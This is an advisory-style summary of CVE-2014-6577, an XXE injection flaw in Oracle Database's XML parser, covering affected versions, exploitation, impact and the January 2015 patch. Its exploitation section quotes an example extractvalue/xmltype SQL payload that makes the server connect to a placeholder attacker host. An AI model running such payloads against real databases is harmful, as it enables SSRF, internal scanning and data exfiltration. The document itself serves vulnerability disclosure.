CVE-2014-6577

Vulnerability

CVE-2014-6577 is an unspecified vulnerability in the XML Developer's Kit for C component of Oracle Database Server, which has been identified as an XML External Entity (XXE) injection issue in the XML parser module. Affected versions include 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2. The vulnerability can be triggered by calling the extractvalue() function for an xmltype object with a crafted http: or ftp: URI [1].

Exploitation

An attacker requires the CREATE SESSION privilege and network access to the database. By sending a specially-crafted SQL query using extractvalue() and xmltype() with an XXE payload that references an external entity via HTTP or FTP, the vulnerable XML resolver will attempt to connect to the attacker-controlled URI. For example, a query like select extractvalue(xmltype('<!ENTITY xxe SYSTEM "https://IP/test">]><xxe;'),'/l') from dual; can trigger outbound connections from the database server [1].

Impact

Successful exploitation allows an authenticated remote attacker to affect confidentiality via unknown vectors (according to Oracle). The researcher's claim indicates that the XXE injection can be used for internal port scanning, Server-Side Request Forgery (SSRF) attacks, out-of-band data exfiltration, or denial-of-service (DoS). The FILE URI handler is converted to an XDB Repository path and fails, but HTTP and FTP URIs cause the server to attempt connections, enabling these attacks [1].

Mitigation

Oracle released a fix as part of the January 2015 Critical Patch Update (CPU). The affected versions should be updated to the patched version corresponding to their release. No workarounds are provided; applying the CPU is the recommended mitigation. There is no indication that this CVE is listed in CISA's Known Exploited Vulnerabilities (KEV) catalog [1].